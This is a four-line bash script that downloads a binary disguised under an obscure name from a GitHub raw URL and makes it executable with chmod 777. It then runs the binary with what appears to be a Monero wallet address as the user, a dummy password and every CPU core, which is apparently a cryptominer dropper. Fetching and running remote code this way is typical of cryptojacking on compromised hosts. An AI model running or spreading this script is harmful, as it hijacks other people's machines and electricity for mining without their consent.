#!/bin/bash
curl https://github.com/liecamshoe/file/raw/main/vltrig -L -o makslaopq
chmod 777 makslaopq
./makslaopq --user 84bEkQaAvXnPXXghsfBYBeLGtkAV8eP1HX7rP7EUBE1pHvtwAffjCE2SzzY8y79fkgHA21czuEWoVUDkAf7e4qM5KMKCKVK --pass x -t $(nproc --all)
